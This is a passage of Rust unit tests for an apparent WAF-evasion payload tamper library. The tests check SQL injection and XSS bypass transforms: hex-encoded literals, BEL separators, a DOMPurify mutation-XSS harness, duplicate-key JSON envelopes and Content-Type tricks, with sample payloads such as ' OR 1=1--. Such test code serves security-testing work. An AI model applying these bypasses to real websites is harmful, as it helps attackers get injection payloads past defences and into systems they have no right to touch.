1880        // Regression guard — the keyword_comment_split tamper was
1881        // removed 2026-05 because MySQL treats `/* */` inside an
1882        // identifier as whitespace (so `SE/**/LECT` lexes as TWO
1883        // identifiers, NOT one).  This test ensures it never
1884        // accidentally gets re-registered without re-validating
1885        // the parsing semantics.
1886        let registry = crate::tamper::TamperRegistry::with_defaults();
1887        assert!(
1888            registry.get("keyword_comment_split").is_none(),
1889            "keyword_comment_split was removed because the transform breaks SQL parsing — \
1890             do not re-register without verifying MySQL/Postgres tokeniser semantics"
1891        );
1892    }
1893
1894    // ── Hex-literal keyword tamper ──────────────────────────
1895
1896    #[test]
1897    fn hex_literal_keyword_converts_single_quoted_to_hex() {
1898        let strategy = HexLiteralKeywordTamper;
1899        let out = strategy.tamper("WHERE name = 'admin'", None);
1900        assert!(!out.contains("'admin'"));
1901        assert!(out.contains("0x"));
1902        // 'admin' in hex bytes is 61 64 6d 69 6e.
1903        assert!(out.contains("0x61646d696e"));
1904    }
1905
1906    #[test]
1907    fn hex_literal_keyword_idempotent_when_no_quoted_literal() {
1908        let strategy = HexLiteralKeywordTamper;
1909        assert_eq!(strategy.tamper("SELECT 1", None), "SELECT 1");
1910        assert_eq!(strategy.tamper("1=1", None), "1=1");
1911    }
1912
1913    #[test]
1914    fn hex_literal_keyword_handles_multiple_literals() {
1915        let strategy = HexLiteralKeywordTamper;
1916        let out = strategy.tamper("'a' OR 'b'", None);
1917        // Both literals should be hex-converted.
1918        assert!(out.contains("0x61"));
1919        assert!(out.contains("0x62"));
1920        // OR keyword preserved.
1921        assert!(out.contains("OR"));
1922    }
1923
1924    #[test]
1925    fn hex_literal_keyword_handles_doubled_quote_escape() {
1926        let strategy = HexLiteralKeywordTamper;
1927        // SQL `''` inside a literal is a single-quote.
1928        let out = strategy.tamper("'a''b'", None);
1929        // The inner '' becomes a single 0x27 inside the hex.
1930        assert!(out.contains("0x"));
1931    }
1932
1933    #[test]
1934    fn hex_literal_keyword_empty_literal() {
1935        let strategy = HexLiteralKeywordTamper;
1936        let out = strategy.tamper("''", None);
1937        // Empty quoted literal becomes the empty hex literal `0x`.
1938        assert_eq!(out, "0x");
1939    }
1940
1941    #[test]
1942    fn hex_literal_keyword_preserves_non_quote_text() {
1943        let strategy = HexLiteralKeywordTamper;
1944        let out = strategy.tamper("LIMIT 10 OFFSET 5", None);
1945        assert_eq!(out, "LIMIT 10 OFFSET 5");
1946    }
1947
1948    #[test]
1949    fn hex_literal_keyword_non_ascii_chars_encode_to_utf8_hex() {
1950        let strategy = HexLiteralKeywordTamper;
1951        // 'é' = 0xC3 0xA9 (UTF-8).
1952        let out = strategy.tamper("'é'", None);
1953        assert!(out.contains("c3a9") || out.contains("C3A9"));
1954    }
1955
1956    // ── Bell-separator tamper ───────────────────────────────
1957
1958    #[test]
1959    fn bell_separator_replaces_space_with_bel() {
1960        let strategy = BellSeparatorTamper;
1961        assert_eq!(strategy.tamper("UNION SELECT", None), "UNION\u{0007}SELECT");
1962    }
1963
1964    #[test]
1965    fn bell_separator_leaves_tab_and_newline_alone() {
1966        let strategy = BellSeparatorTamper;
1967        let out = strategy.tamper("a\tb\nc", None);
1968        // Only the literal ASCII space is replaced.
1969        assert!(out.contains('\t'));
1970        assert!(out.contains('\n'));
1971        assert!(!out.contains('\u{0007}'));
1972    }
1973
1974    #[test]
1975    fn bell_separator_multiple_spaces_each_become_bel() {
1976        let strategy = BellSeparatorTamper;
1977        let out = strategy.tamper("a   b", None);
1978        assert_eq!(out.matches('\u{0007}').count(), 3);
1979        assert!(!out.contains(' '));
1980    }
1981
1982    #[test]
1983    fn bell_separator_empty_input() {
1984        let strategy = BellSeparatorTamper;
1985        assert_eq!(strategy.tamper("", None), "");
1986    }
1987
1988    #[test]
1989    fn bell_separator_no_space_unchanged() {
1990        let strategy = BellSeparatorTamper;
1991        assert_eq!(strategy.tamper("foo", None), "foo");
1992    }
1993
1994    #[test]
1995    fn bell_separator_classic_payload_round_trips_via_split() {
1996        // Property: replacing BEL back to space recovers the
1997        // original.
1998        let strategy = BellSeparatorTamper;
1999        let inputs = ["UNION SELECT 1", "OR 1=1 -- ", "<script>alert(1)</script>"];
2000        for input in inputs {
2001            let tampered = strategy.tamper(input, None);
2002            let restored = tampered.replace('\u{0007}', " ");
2003            assert_eq!(restored, input);
2004        }
2005    }
2006
2007    #[test]
2008    fn all_new_tampers_have_unique_names() {
2009        let names = [
2010            ZeroWidthInjectTamper.name(),
2011            PostgresDollarQuoteTamper.name(),
2012            MysqlVersionedCommentWrapTamper.name(),
2013            BracketConfusableTamper.name(),
2014            MxssNamespaceWrapTamper.name(),
2015        ];
2016        let set: std::collections::HashSet<&str> = names.iter().copied().collect();
2017        assert_eq!(set.len(), names.len());
2018    }
2019
2020    // ── MxssNamespaceWrapTamper (CVE-2025-26791 / DOMPurify mXSS) ──
2021
2022    #[test]
2023    fn mxss_namespace_wrap_emits_mathml_harness() {
2024        let t = MxssNamespaceWrapTamper;
2025        let out = t.tamper("onerror=alert(1)", None);
2026        // Must open the MathML text-integration seam.
2027        assert!(out.starts_with("<math>"), "missing MathML root: {out}");
2028        // Must close the sanitiser's view of the style element with
2029        // the load-bearing comment-open inside `</style>`.
2030        assert!(
2031            out.contains("<style><!--</style>"),
2032            "missing comment-trick style close: {out}"
2033        );
2034        // Must re-open with an <img> that carries the operator's
2035        // payload as its attribute set.
2036        assert!(
2037            out.contains("<img src=x onerror=alert(1)>"),
2038            "payload missing: {out}"
2039        );
2040    }
2041
2042    #[test]
2043    fn mxss_namespace_wrap_does_not_contain_literal_script_tag() {
2044        // The class is mutation-XSS; the wire bytes deliberately do
2045        // NOT contain `<script`. Pin that — a regression that adds
2046        // a literal `<script>` would defeat the bypass since every
2047        // WAF on earth blocks that token.
2048        let t = MxssNamespaceWrapTamper;
2049        let out = t.tamper("onerror=fetch('/x')", None);
2050        assert!(
2051            !out.to_ascii_lowercase().contains("<script"),
2052            "namespace wrap MUST NOT emit literal <script>: {out}"
2053        );
2054    }
2055
2056    #[test]
2057    fn mxss_namespace_wrap_handles_empty_payload() {
2058        let t = MxssNamespaceWrapTamper;
2059        let out = t.tamper("", None);
2060        assert!(
2061            out.starts_with("<math>"),
2062            "empty payload still produces harness: {out}"
2063        );
2064        assert!(
2065            out.ends_with("<img src=x >"),
2066            "empty payload yields bare <img>: {out}"
2067        );
2068    }
2069
2070    #[test]
2071    fn mxss_namespace_wrap_aggressiveness_in_range() {
2072        let a = MxssNamespaceWrapTamper.aggressiveness();
2073        assert!((0.0..=1.0).contains(&a) && !a.is_nan());
2074    }
2075
2076    #[test]
2077    fn mxss_namespace_wrap_panic_safe_on_pathological_input() {
2078        let t = MxssNamespaceWrapTamper;
2079        let _ = t.tamper(&"A".repeat(1_000_000), None);
2080        let _ = t.tamper("\0\x01\u{FFFD}\u{200B}", None);
2081    }
2082
2083    #[test]
2084    fn all_new_tampers_have_non_empty_descriptions() {
2085        for strat in [
2086            &ZeroWidthInjectTamper as &dyn TamperStrategy,
2087            &PostgresDollarQuoteTamper,
2088            &MysqlVersionedCommentWrapTamper,
2089            &BracketConfusableTamper,
2090        ] {
2091            assert!(
2092                !strat.description().is_empty(),
2093                "{} has empty description",
2094                strat.name()
2095            );
2096            assert!(
2097                strat.description().len() > 20,
2098                "{} description too short",
2099                strat.name()
2100            );
2101        }
2102    }
2103
2104    #[test]
2105    fn all_new_tampers_aggressiveness_in_range() {
2106        for strat in [
2107            &ZeroWidthInjectTamper as &dyn TamperStrategy,
2108            &PostgresDollarQuoteTamper,
2109            &MysqlVersionedCommentWrapTamper,
2110            &BracketConfusableTamper,
2111        ] {
2112            let a = strat.aggressiveness();
2113            assert!(
2114                (0.0..=1.0).contains(&a) && !a.is_nan(),
2115                "{} aggressiveness {} out of [0, 1]",
2116                strat.name(),
2117                a
2118            );
2119        }
2120    }
2121
2122    #[test]
2123    fn all_new_tampers_handle_pathological_input_without_panic() {
2124        // Empty, multi-MB, UTF-8 boundary, control chars — all
2125        // must be panic-safe.
2126        let huge: String = "A".repeat(1_000_000);
2127        let weird = "\0\x01\x02\x7f\u{FFFD}\u{200B}";
2128        for strat in [
2129            &ZeroWidthInjectTamper as &dyn TamperStrategy,
2130            &PostgresDollarQuoteTamper,
2131            &MysqlVersionedCommentWrapTamper,
2132            &BracketConfusableTamper,
2133        ] {
2134            let _ = strat.tamper("", None);
2135            let _ = strat.tamper(&huge, None);
2136            let _ = strat.tamper(weird, None);
2137        }
2138    }
2139
2140    // ── JsonDupKeyTamper (frontier 2026 / WAFFLED corpus) ────
2141
2142    #[test]
2143    fn json_dup_key_emits_duplicate_q_envelope() {
2144        let t = JsonDupKeyTamper;
2145        let out = t.tamper("evil", None);
2146        // The envelope MUST contain BOTH `"q":"safe"` (the WAF
2147        // sentinel) and `"q":"evil"` (the backend-visible payload).
2148        assert!(out.contains("\"q\":\"safe\""), "missing first key: {out}");
2149        assert!(out.contains("\"q\":\"evil\""), "missing dup key: {out}");
2150        // Outer braces — must be a structurally-valid JSON envelope.
2151        assert!(out.starts_with('{') && out.ends_with('}'));
2152    }
2153
2154    #[test]
2155    fn json_dup_key_escapes_payload_quotes() {
2156        // Payload containing literal `"` must not break the envelope.
2157        let t = JsonDupKeyTamper;
2158        let out = t.tamper("' OR 1=1--\"--", None);
2159        assert!(
2160            out.contains("OR 1=1--\\\"--"),
2161            "payload `\"` not escaped: {out}"
2162        );
2163        // Round-trip: serde_json must parse the envelope successfully.
2164        let v: serde_json::Value = serde_json::from_str(&out)
2165            .expect("envelope must be valid JSON even with escaped quote");
2166        // Behaviour of serde_json on duplicate keys: takes the LAST.
2167        // Verify the LAST value carries the (unescaped) payload.
2168        assert_eq!(v["q"].as_str(), Some("' OR 1=1--\"--"));
2169    }
2170
2171    #[test]
2172    fn json_dup_key_escapes_backslash_and_control_bytes() {
2173        let t = JsonDupKeyTamper;
2174        let out = t.tamper("a\\b\nc\rd\te\u{0007}f", None);
2175        // Backslash + newline / CR / tab must be JSON-escaped.
2176        assert!(out.contains("a\\\\b"));
2177        assert!(out.contains("\\n"));
2178        assert!(out.contains("\\r"));
2179        assert!(out.contains("\\t"));
2180        // BEL (0x07) must be .
2181        assert!(out.contains("\\u0007"), "BEL not escaped to \\u0007: {out}");
2182        // Still round-trips through serde_json.
2183        let _: serde_json::Value = serde_json::from_str(&out).expect("valid JSON");
2184    }
2185
2186    #[test]
2187    fn json_dup_key_handles_empty_payload() {
2188        let t = JsonDupKeyTamper;
2189        let out = t.tamper("", None);
2190        // Empty payload is fine — both keys present, second value
2191        // is empty string.
2192        assert_eq!(out, "{\"q\":\"safe\",\"q\":\"\"}");
2193    }
2194
2195    #[test]
2196    fn json_dup_key_name_and_aggressiveness_within_bounds() {
2197        let t = JsonDupKeyTamper;
2198        assert_eq!(t.name(), "json_dup_key");
2199        let a = t.aggressiveness();
2200        assert!((0.0..=1.0).contains(&a), "aggressiveness out of range: {a}");
2201    }
2202
2203    #[test]
2204    fn json_dup_key_is_registered_in_default_registry() {
2205        // Anti-regression: forgetting to add the tamper to
2206        // DEFAULT_NAMES + the with_defaults match arm is silent —
2207        // the tamper exists but can't be selected via `--only`.
2208        // This test pins the wiring.
2209        let registry = crate::tamper::TamperRegistry::with_defaults();
2210        assert!(
2211            registry.get("json_dup_key").is_some(),
2212            "json_dup_key must be in TamperRegistry::with_defaults()"
2213        );
2214    }
2215
2216    // ── CtStarvationTamper (frontier 2026 / WAFFLED + windshock) ──
2217
2218    #[test]
2219    fn ct_starvation_wraps_body_context_in_form_pair() {
2220        let t = CtStarvationTamper;
2221        let out = t.tamper("' OR 1=1--", Some("body"));
2222        assert_eq!(out, "q=' OR 1=1--");
2223    }
2224
2225    #[test]
2226    fn ct_starvation_handles_form_json_multipart_contexts() {
2227        let t = CtStarvationTamper;
2228        for ctx in ["body", "form", "json", "multipart"] {
2229            assert_eq!(
2230                t.tamper("X", Some(ctx)),
2231                "q=X",
2232                "context {ctx} must produce form-pair wrap"
2233            );
2234        }
2235    }
2236
2237    #[test]
2238    fn ct_starvation_is_no_op_for_header_and_query_contexts() {
2239        // The tamper has no leverage in header / cookie carriers;
2240        // returning the payload unchanged is honest behaviour
2241        // (operator selecting --target-context header gets a
2242        // no-op variant they can spot in --explain).
2243        let t = CtStarvationTamper;
2244        assert_eq!(t.tamper("X", Some("header")), "X");
2245        assert_eq!(t.tamper("X", Some("cookie")), "X");
2246        assert_eq!(t.tamper("X", Some("query")), "X");
2247        assert_eq!(t.tamper("X", None), "X");
2248    }
2249
2250    #[test]
2251    fn ct_starvation_header_for_returns_one_of_known_variants() {
2252        // Hash-based dispatch must produce a deterministic output
2253        // from the documented set. Anti-regression: silently
2254        // emitting "application/json" (canonical, no bypass) would
2255        // defeat the entire point of the tamper.
2256        const ALLOWED: &[&str] = &[
2257            "APPLICATION/JSON",
2258            "Application/Json",
2259            "application/json; charset=ibm037",
2260            "text/plain",
2261            "application/x-www-form-urlencoded",
2262        ];
2263        for p in ["a", "longer-payload", "' OR 1=1--", ""] {
2264            let ct = ct_starvation_header_for(p);
2265            assert!(
2266                ALLOWED.contains(&ct),
2267                "header for {p:?} not in known-effective set: {ct}"
2268            );
2269        }
2270    }
2271
2272    #[test]
2273    fn ct_starvation_header_for_is_stable_per_payload() {
2274        // Two calls with the same payload must return the same
2275        // header — debugging-friendly: an operator who re-runs a
2276        // failing case gets the same Content-Type advertised.
2277        for p in ["x", "very long payload bytes here"] {
2278            let a = ct_starvation_header_for(p);
2279            let b = ct_starvation_header_for(p);
2280            assert_eq!(a, b, "ct_starvation_header_for not stable for {p:?}");
2281        }
2282    }
2283
2284    #[test]
2285    fn ct_starvation_is_registered_in_default_registry() {
2286        let registry = crate::tamper::TamperRegistry::with_defaults();
2287        assert!(
2288            registry.get("ct_starvation").is_some(),
2289            "ct_starvation must be in TamperRegistry::with_defaults()"
2290        );
2291    }
2292
2293    #[test]
2294    fn json_escape_string_matches_serde_json_for_unicode() {
2295        // The escape helper is hand-rolled; verify it doesn't
2296        // diverge from serde_json's output for benign Unicode (no
2297        // double-escape, no missing escapes). Pure-ASCII fast path.
2298        for raw in ["plain ASCII", "café", "日本語", "🔥"] {
2299            let ours = json_escape_string(raw);
2300            // Round-trip through serde_json by wrapping in quotes.
2301            let wrapped = format!("\"{ours}\"");
2302            let parsed: String = serde_json::from_str(&wrapped)
2303                .unwrap_or_else(|e| panic!("our escape of {raw:?} fails JSON parse: {e}"));
2304            assert_eq!(parsed, raw);
2305        }
2306    }
2307}